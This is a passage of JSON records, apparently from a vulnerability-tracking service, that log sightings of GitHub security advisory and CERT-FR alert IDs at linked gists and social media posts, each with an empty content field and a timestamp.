"content": "", "creation_timestamp": "2025-07-16T04:43:36.000000Z"}, {"uuid": "773c5e82-7876-4492-bd38-604e89349dee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/429eb5065c57b5f314e94285b42826c9", "content": "", "creation_timestamp": "2025-07-16T09:28:15.000000Z"}, {"uuid": "f01079bf-1340-4531-a9f0-9808d8e2ac50", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jjjh-jjxp-wpff", "type": "seen", "source": "https://gist.github.com/safer-bot/8570432847a97bb6642bd518a8decb68", "content": "", "creation_timestamp": "2025-07-16T12:56:12.000000Z"}, {"uuid": "e363a976-f4b7-4083-b569-4a2418ca634e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/8570432847a97bb6642bd518a8decb68", "content": "", "creation_timestamp": "2025-07-16T12:56:12.000000Z"}, {"uuid": "b4dc02a6-e596-4033-b324-ddbc5cc190ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/8570432847a97bb6642bd518a8decb68", "content": "", "creation_timestamp": "2025-07-16T12:56:12.000000Z"}, {"uuid": "197faae6-0baa-463b-9275-c07d69b92a63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/8570432847a97bb6642bd518a8decb68", "content": "", "creation_timestamp": "2025-07-16T12:56:12.000000Z"}, {"uuid": "6fece408-a06e-4e69-97bc-def35587f591", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rgv9-q543-rqg4", "type": "seen", "source": "https://gist.github.com/safer-bot/8570432847a97bb6642bd518a8decb68", "content": "", "creation_timestamp": "2025-07-16T12:56:12.000000Z"}, {"uuid": "dcda4c0a-4915-4517-a0dd-2cd8ba2cd552", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7xr5-9hcq-chf9", "type": "seen", "source": "https://infosec.exchange/users/DarkWebInformer/statuses/114666135168904419", "content": "", "creation_timestamp": "2025-06-11T18:26:10.364411Z"}, {"uuid": "70f56315-5c5c-42ee-ac43-d93b4a8e8d2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-98p4-xjmm-8mfh", "type": "seen", "source": "https://gist.github.com/EliahKagan/43381741fc0173e40270e3dd7023da06", "content": "", "creation_timestamp": "2025-07-08T18:18:02.000000Z"}, {"uuid": "40596b93-4486-417c-8961-2d88b8478a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mx38-x658-5fwj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114500496210973102", "content": "", "creation_timestamp": "2025-05-13T12:22:00.117041Z"}, {"uuid": "28af6e90-59fb-4359-a245-f286622a0f2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mx38-x658-5fwj", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114500499510580526", "content": "", "creation_timestamp": "2025-05-13T12:22:50.101217Z"}, {"uuid": "13a9c0b1-e884-4892-bc9c-24396a7bc11d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qpv8-g6qv-rf8p", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114501334070497265", "content": "", "creation_timestamp": "2025-05-13T15:55:04.706154Z"}, {"uuid": "0a37cf4a-5765-4a9d-bd5a-07a2a605ccc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-006", "type": "seen", "source": "https://bsky.app/profile/cti-news.bsky.social/post/3lp2viqexeb2s", "content": "", "creation_timestamp": "2025-05-13T16:24:21.556332Z"}, {"uuid": "7f1e3f78-2ac2-4711-9a01-ebebaf579156", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-006", "type": "seen", "source": "https://bsky.app/profile/cert-fr.bsky.social/post/3lp2vo27f5z2m", "content": "", "creation_timestamp": "2025-05-13T16:27:19.860491Z"}, {"uuid": "5e4147f2-2525-4003-aa72-81bf9c7b860e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2025-ALE-006", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/114501460843103816", "content": "", "creation_timestamp": "2025-05-13T16:27:20.413190Z"}, {"uuid": "a0f7b8a1-5c6b-4157-9ed5-0a6f55538f07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hgqp-3mmf-7h8f", "type": "seen", "source": "https://seclists.org/oss-sec/2025/q2/273", "content": "", "creation_timestamp": "2025-06-23T23:32:45.000000Z"}, {"uuid": "aa02ed5b-1f11-4d86-a70e-03cc4c753c16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wjxj-5m7g-mg7q", "type": "seen", "source": "https://gist.github.com/safer-bot/462e0a3d9968559e1a005f457ab6feb0", "content": "", "creation_timestamp": "2025-07-16T05:01:52.000000Z"}, {"uuid": "77fecf83-5ed9-4f8d-b2ec-dd64dc2513c0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73xv-w5gp-frxh", "type": "seen", "source": "https://gist.github.com/safer-bot/462e0a3d9968559e1a005f457ab6feb0", "content": "", "creation_timestamp": "2025-07-16T05:01:52.000000Z"}, {"uuid": "cbf930f4-1146-4ebf-9535-e2aa4fdff330", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-72m5-fvvv-55m6", "type": "seen", "source": "https://gist.github.com/safer-bot/462e0a3d9968559e1a005f457ab6feb0", "content": "", "creation_timestamp": "2025-07-16T05:01:52.000000Z"}, {"uuid": "f070d4ff-83c2-47e0-91da-0140a6ad7300", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gv87-q66h-4277", "type": "seen", "source": "https://gist.github.com/safer-bot/a0b20e4a34869c7132cfaf7355961494", "content": "", "creation_timestamp": "2025-07-16T11:16:51.000000Z"}, {"uuid": "cdf0bb99-adb2-41cc-bad5-07948dcd561e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gm62-rw4g-vrc4", "type": "seen", "source": "https://gist.github.com/safer-bot/5c50faba7bb4f4a3b807fa4e4fecb5b8", "content": "", "creation_timestamp": "2025-07-16T12:59:22.000000Z"}, {"uuid": "10fec8fb-0154-4259-8aa2-25105504a246", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4446-656p-f54g", "type": "seen", "source": "https://gist.github.com/safer-bot/462e0a3d9968559e1a005f457ab6feb0", "content": "", "creation_timestamp": "2025-07-16T05:01:52.000000Z"}, {"uuid": "21f7c1c9-08a6-47d3-b985-bc6e4dfc27eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v435-xc8x-wvr9", "type": "seen", "source": "https://gist.github.com/safer-bot/462e0a3d9968559e1a005f457ab6feb0", "content": "", "creation_timestamp": "2025-07-16T05:01:52.000000Z"}, {"uuid": "7377054f-1cee-47e1-a536-7bd2d181a15f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8xfc-gm6g-vgpv", "type": "seen", "source": "https://gist.github.com/safer-bot/462e0a3d9968559e1a005f457ab6feb0", "content": "", "creation_timestamp": "2025-07-16T05:01:52.000000Z"}, {"uuid": "ee271239-9502-402c-8fda-386ba5c3f9a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/ba2549bf017427f5f1f1855302644998", "content": "", "creation_timestamp": "2025-07-16T09:33:37.000000Z"}, {"uuid": "b6d27ab1-a67e-4482-8747-2b4d489127b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/ba2549bf017427f5f1f1855302644998", "content": "", "creation_timestamp": "2025-07-16T09:33:37.000000Z"}, {"uuid": "33e92a11-5580-403e-b650-6b3a93c14e2e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hr8g-6v94-x4m9", "type": "seen", "source": "https://gist.github.com/safer-bot/462e0a3d9968559e1a005f457ab6feb0", "content": "", "creation_timestamp": "2025-07-16T05:01:52.000000Z"}, {"uuid": "5a1fc9dd-2e2d-487b-987a-190468b51ad9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6xx3-rg99-gc3p", "type": "seen", "source": "https://gist.github.com/safer-bot/462e0a3d9968559e1a005f457ab6feb0", "content": "", "creation_timestamp": "2025-07-16T05:01:52.000000Z"}, {"uuid": "8c73a7ee-1f09-42c3-bd9f-578b2acd50e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/ba2549bf017427f5f1f1855302644998", "content": "", "creation_timestamp": "2025-07-16T09:33:37.000000Z"}, {"uuid": "8b0f2d68-de69-494a-9340-a87c813225d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/ba2549bf017427f5f1f1855302644998", "content": "", "creation_timestamp": "2025-07-16T09:33:37.000000Z"}, {"uuid": "3a826456-b5b5-43dc-8ca6-35c4cf9009fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/ba2549bf017427f5f1f1855302644998", "content": "", "creation_timestamp": "2025-07-16T09:33:37.000000Z"}, {"uuid": "854f568e-1e12-4122-9186-2d6917d4344d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-xq3w-v528-46rv", "type": "seen", "source": "https://gist.github.com/safer-bot/d143b158efbe93bddedc21cd35d69f96", "content": "", "creation_timestamp": "2025-07-16T05:05:11.000000Z"}, {"uuid": "dbf47362-de9d-423e-b378-59620f2d0a7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jr6h-r7vg-f9mc", "type": "seen", "source": "https://gist.github.com/safer-bot/d143b158efbe93bddedc21cd35d69f96", "content": "", "creation_timestamp": "2025-07-16T05:05:11.000000Z"}, {"uuid": "1ea66b41-5e54-4d07-add2-d23fe486c6f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-735f-pc8j-v9w8", "type": "seen", "source": "https://gist.github.com/safer-bot/d143b158efbe93bddedc21cd35d69f96", "content": "", "creation_timestamp": "2025-07-16T05:05:11.000000Z"}, {"uuid": "bd8f8486-6290-4ff2-88f1-2ee040bdab35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-389x-839f-4rhx", "type": "seen", "source": "https://gist.github.com/safer-bot/d143b158efbe93bddedc21cd35d69f96", "content": "", "creation_timestamp": "2025-07-16T05:05:11.000000Z"}, {"uuid": "528af7aa-5537-4518-8add-82c3ce100d36", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4g8c-wm8x-jfhw", "type": "seen", "source": "https://gist.github.com/safer-bot/d143b158efbe93bddedc21cd35d69f96", "content": "", "creation_timestamp": "2025-07-16T05:05:11.000000Z"}, {"uuid": "207fb29e-098c-4164-b02c-2e3908c6d543", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jfh8-c2jp-5v3q", "type": "seen", "source": "https://gist.github.com/safer-bot/36999e3d8163b7f4c1934f5db4c70cc6", "content": "", "creation_timestamp": "2025-07-16T09:35:26.000000Z"}, {"uuid": "7b0a4b72-1b9c-450a-8742-c820ab866c43", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p6xc-xr62-6r2g", "type": "seen", "source": "https://gist.github.com/safer-bot/36999e3d8163b7f4c1934f5db4c70cc6", "content": "", "creation_timestamp": "2025-07-16T09:35:26.000000Z"}, {"uuid": "5135562b-c393-4fe3-a2bc-e47243b89bb9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rjr-3q55-vv33", "type": "seen", "source": "https://gist.github.com/safer-bot/36999e3d8163b7f4c1934f5db4c70cc6", "content": "", "creation_timestamp": "2025-07-16T09:35:26.000000Z"}, {"uuid": "ea37a276-edce-41a5-aed7-89999c77bac7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5mg8-w23w-74h3", "type": "seen", "source": "https://gist.github.com/safer-bot/a00f8cb84b312e5800bb50015fa7fb85", "content": "", "creation_timestamp": "2025-07-16T05:08:00.000000Z"}, {"uuid": "b0314555-c655-4de7-9080-18c262912fa8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/a00f8cb84b312e5800bb50015fa7fb85", "content": "", "creation_timestamp": "2025-07-16T05:08:00.000000Z"}, {"uuid": "2b07af22-2bb2-4a08-8ba6-b174b1bd4fdb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7g45-4rm6-3mm3", "type": "seen", "source": "https://gist.github.com/safer-bot/a00f8cb84b312e5800bb50015fa7fb85", "content": "", "creation_timestamp": "2025-07-16T05:08:00.000000Z"}, {"uuid": "335720b8-f600-4ae4-80d3-745eccb73dca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8489-44mv-ggj8", "type": "seen", "source": "https://gist.github.com/safer-bot/36999e3d8163b7f4c1934f5db4c70cc6", "content": "", "creation_timestamp": "2025-07-16T09:35:26.000000Z"}, {"uuid": "848e5b5f-389f-4aa1-8ee7-c0f0af85959f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/36999e3d8163b7f4c1934f5db4c70cc6", "content": "", "creation_timestamp": "2025-07-16T09:35:26.000000Z"}, {"uuid": "a3d2cd4f-dd52-484b-a666-4a1d7411edc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w9p3-5cr8-m3jj", "type": "seen", "source": "https://gist.github.com/safer-bot/809ac969726f84764954afe6f8b317c4", "content": "", "creation_timestamp": "2025-07-16T11:17:24.000000Z"}, {"uuid": "5efb40e8-98c5-48f7-8df2-8a12b362ba7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w33c-445m-f8w7", "type": "seen", "source": "https://gist.github.com/safer-bot/4bcbc73b93421d970077a9b0d98e8e58", "content": "", "creation_timestamp": "2025-07-16T05:09:39.000000Z"}, {"uuid": "75174e60-1759-4cc5-8bb7-bc0e2db52b2a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/4bcbc73b93421d970077a9b0d98e8e58", "content": "", "creation_timestamp": "2025-07-16T05:09:39.000000Z"}, {"uuid": "f85e6b5c-de19-4a52-9087-bef214a5e613", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pq2g-wx69-c263", "type": "seen", "source": "https://gist.github.com/safer-bot/82f31fcfbaf8bf9c17bb37bf21fc4c58", "content": "", "creation_timestamp": "2025-07-16T09:35:59.000000Z"}, {"uuid": "c7be125a-056c-4abc-b9c8-122c3b3c6b37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-chfm-68vv-pvw5", "type": "seen", "source": "https://gist.github.com/safer-bot/82f31fcfbaf8bf9c17bb37bf21fc4c58", "content": "", "creation_timestamp": "2025-07-16T09:35:59.000000Z"}, {"uuid": "831da505-91e8-4ab7-aeb7-2727376060bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/4bcbc73b93421d970077a9b0d98e8e58", "content": "", "creation_timestamp": "2025-07-16T05:09:39.000000Z"}, {"uuid": "f112f405-1d3b-452c-904d-c00a9106330d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4gc7-5j7h-4qph", "type": "seen", "source": "https://gist.github.com/safer-bot/82f31fcfbaf8bf9c17bb37bf21fc4c58", "content": "", "creation_timestamp": "2025-07-16T09:35:59.000000Z"}, {"uuid": "ff50bf1b-f75e-4459-a447-fddf0edbd34d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/82f31fcfbaf8bf9c17bb37bf21fc4c58", "content": "", "creation_timestamp": "2025-07-16T09:35:59.000000Z"}, {"uuid": "5f95e14e-e857-4570-bded-8bfa70441c5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f7vh-qwp3-x37m", "type": "seen", "source": "https://gist.github.com/safer-bot/809ac969726f84764954afe6f8b317c4", "content": "", "creation_timestamp": "2025-07-16T11:17:24.000000Z"}, {"uuid": "50a25aad-6833-4005-8ff6-1b5d52c6fb7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qrg-x229-3v8q", "type": "seen", "source": "https://gist.github.com/safer-bot/809ac969726f84764954afe6f8b317c4", "content": "", "creation_timestamp": "2025-07-16T11:17:24.000000Z"}, {"uuid": "54198215-15cd-4f92-b223-547056a4c63b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/809ac969726f84764954afe6f8b317c4", "content": "", "creation_timestamp": "2025-07-16T11:17:24.000000Z"}, {"uuid": "cb30eeb1-b7fd-46fd-82a0-b4508d5f513c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-65fg-84f6-3jq3", "type": "seen", "source": "https://gist.github.com/safer-bot/809ac969726f84764954afe6f8b317c4", "content": "", "creation_timestamp": "2025-07-16T11:17:24.000000Z"}, {"uuid": "315b2dad-a49c-4d3d-8141-0b1b8a4ab3a8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fp5r-v3w9-4333", "type": "seen", "source": "https://gist.github.com/safer-bot/809ac969726f84764954afe6f8b317c4", "content": "", "creation_timestamp": "2025-07-16T11:17:24.000000Z"}, {"uuid": "3f1000cb-eaea-4206-b7a4-0f670a57912f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vmq6-5m68-f53m", "type": "seen", "source": "https://gist.github.com/safer-bot/5c50faba7bb4f4a3b807fa4e4fecb5b8", "content": "", "creation_timestamp": "2025-07-16T12:59:22.000000Z"}, {"uuid": "6681ab49-7e67-46f4-a4e4-c1ec44fe32a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6v67-2wr5-gvf4", "type": "seen", "source": "https://gist.github.com/safer-bot/5c50faba7bb4f4a3b807fa4e4fecb5b8", "content": "", "creation_timestamp": "2025-07-16T12:59:22.000000Z"}, {"uuid": "f1331bfb-062a-45b8-8d84-4fa9a5afa939", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78wr-2p64-hpwj", "type": "seen", "source": "https://gist.github.com/safer-bot/7c2381e168e19f2726a9f481fe4c9db2", "content": "", "creation_timestamp": "2025-07-16T13:44:07.000000Z"}, {"uuid": "9b1a8cee-b8f1-4baf-9617-79c19815c670", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mvr2-9pj6-7w5j", "type": "seen", "source": "https://gist.github.com/safer-bot/7c3c18d825bd276c1e08ed28ddc07745", "content": "", "creation_timestamp": "2025-07-16T14:32:14.000000Z"}, {"uuid": "4cdd350b-bbea-4601-9761-b19553775127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-269g-pwp5-87pp", "type": "seen", "source": "https://gist.github.com/safer-bot/4bcbc73b93421d970077a9b0d98e8e58", "content": "", "creation_timestamp": "2025-07-16T05:09:39.000000Z"}, {"uuid": "27c2cbcf-f20b-4fe1-9c40-98ab9250935f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pr98-23f8-jwxv", "type": "seen", "source": "https://gist.github.com/safer-bot/82f31fcfbaf8bf9c17bb37bf21fc4c58", "content": "", "creation_timestamp": "2025-07-16T09:35:59.000000Z"}, {"uuid": "e90fc429-a59a-41c2-9b2e-64061fc284c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rc42-6c7j-7h5r", "type": "seen", "source": "https://gist.github.com/safer-bot/82f31fcfbaf8bf9c17bb37bf21fc4c58", "content": "", "creation_timestamp": "2025-07-16T09:35:59.000000Z"}, {"uuid": "f29191bc-60d6-45fb-be2a-ffce13340d23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/50f5ce5c46262e64cc86a3000ffff26a", "content": "", "creation_timestamp": "2025-07-16T11:22:46.000000Z"}, {"uuid": "c0788173-8a79-47e4-879e-3e6df2cfccd2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-668q-qrv7-99fm", "type": "seen", "source": "https://gist.github.com/safer-bot/5c50faba7bb4f4a3b807fa4e4fecb5b8", "content": "", "creation_timestamp": "2025-07-16T12:59:22.000000Z"}, {"uuid": "5cb3702f-b0f9-48b0-9786-b942354f381d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2qp4-g3q3-f92w", "type": "seen", "source": "https://gist.github.com/safer-bot/6ba0327ef93836e33ada465b008ee65d", "content": "", "creation_timestamp": "2025-07-16T13:45:46.000000Z"}, {"uuid": "a426840e-e0aa-44e2-b711-129b1ecdeff6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4jrv-ppp4-jm57", "type": "seen", "source": "https://gist.github.com/safer-bot/6ba0327ef93836e33ada465b008ee65d", "content": "", "creation_timestamp": "2025-07-16T13:45:46.000000Z"}, {"uuid": "de3d4e27-6fa9-4f9d-bb4b-2d71c33b9819", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7r82-7xv7-xcpj", "type": "seen", "source": "https://gist.github.com/safer-bot/6ba0327ef93836e33ada465b008ee65d", "content": "", "creation_timestamp": "2025-07-16T13:45:46.000000Z"}, {"uuid": "24a10e82-2914-49a9-9448-5fc4f4c84a27", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cqj8-47ch-rvvq", "type": "seen", "source": "https://gist.github.com/safer-bot/6ba0327ef93836e33ada465b008ee65d", "content": "", "creation_timestamp": "2025-07-16T13:45:46.000000Z"}, {"uuid": "fd0cbdaf-4eb3-4907-bf8b-ede9b35bfa83", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gwrp-pvrq-jmwv", "type": "seen", "source": "https://gist.github.com/safer-bot/7e41cd98739b152a5cbc9436836d99e7", "content": "", "creation_timestamp": "2025-07-16T05:11:32.000000Z"}, {"uuid": "11e87f05-c443-4b3d-be4b-33441593fe65", "vulnerability_lookup_origin": 